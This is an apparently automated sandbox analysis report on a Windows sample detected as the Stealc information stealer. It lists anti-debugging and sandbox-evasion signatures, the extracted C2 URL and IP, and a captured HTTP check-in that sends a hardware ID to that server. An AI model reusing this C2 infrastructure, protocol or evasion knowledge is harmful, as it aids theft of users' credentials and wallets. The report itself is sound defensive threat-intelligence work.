Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1572096
MD5:c1950c4aafa568b63462b2131c67ceab
SHA1:e2aefdf02e7081c1b6bd03affd8d336642388854
SHA256:2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1136 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C1950C4AAFA568B63462B2131C67CEAB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1656030162.00000000052F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 1136JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 1136JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-10T05:46:59.672495+010020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.206/c4becf79229cb002.phpy~C4Avira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.php47Avira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpp7Avira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpezAvira URL Cloud: Label: malware
              Found malware configuration
              Source: 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
              Multi AV Scanner detection for domain / URL
              Source: http://185.215.113.206/c4becf79229cb002.phpp7Virustotal: Detection: 17%Perma Link
              Multi AV Scanner detection for submitted file
              Source: file.exeVirustotal: Detection: 51%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00594B80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00594B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00596000 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00596000
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B4090 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_005B4090
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00599BE0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00599BE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00599B80 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00599B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A6DE0 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_005A6DE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059ED90 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_0059ED90
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00597690 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00597690
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A6FF9 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_005A6FF9
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005AE330 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005AE330
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A1C40 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005A1C40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A3CC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_005A3CC0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005ACCE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005ACCE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059DD70 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0059DD70
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A15C0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_005A15C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005915B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_005915B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005915A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005915A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005ADE50 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_005ADE50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005AD640 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_005AD640
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A4EC0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_005A4EC0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A2749 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_005A2749
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A2730 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_005A2730

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKFIIEBKEGIEBFIJKFIHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 45 37 35 42 31 38 34 33 37 35 42 33 34 30 37 37 39 30 35 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 2d 2d 0d 0a Data Ascii: ------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="hwid"3E75B184375B340779059------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="build"stok------JKKFIIEBKEGIEBFIJKFI--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00596B80 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy,0_2_00596B80
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKFIIEBKEGIEBFIJKFIHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 45 37 35 42 31 38 34 33 37 35 42 33 34 30 37 37 39 30 35 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 2d 2d 0d 0a Data Ascii: ------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="hwid"3E75B184375B340779059------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="build"stok------JKKFIIEBKEGIEBFIJKFI--
              Source: file.exe, 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.1716207781.0000000001651000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1716207781.0000000001646000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1716207781.0000000001634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.1716207781.0000000001651000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1716207781.0000000001646000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1716207781.000000000166C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.1716207781.0000000001651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
              Source: file.exe, 00000000.00000002.1716207781.000000000166C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php47
              Source: file.exe, 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpez
              Source: file.exe, 00000000.00000002.1716207781.000000000166C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpp7
              Source: file.exe, 00000000.00000002.1716207781.0000000001651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpy~C4
              Source: file.exe, 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpz
              Source: file.exe, 00000000.00000002.1716207781.0000000001646000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
              Source: file.exe, 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.2065
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00599876 CreateDesktopA,lstrcat,lstrcat,lstrcat,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,0_2_00599876

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008930C70_2_008930C7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B48D00_2_005B48D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094A03E0_2_0094A03E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094F02F0_2_0094F02F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009540730_2_00954073
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008CD1D30_2_008CD1D3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008909480_2_00890948
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F336B0_2_007F336B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094BBC90_2_0094BBC9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00946B360_2_00946B36
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086AB5D0_2_0086AB5D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009485A20_2_009485A2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0092CD040_2_0092CD04
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009435260_2_00943526
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00821D4C0_2_00821D4C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009526320_2_00952632
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009457310_2_00945731
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00594980 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: yyknqjng ZLIB complexity 0.9947840568286681
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B39F0 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_005B39F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005ACBE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_005ACBE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\QWVKCJDY.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeVirustotal: Detection: 51%
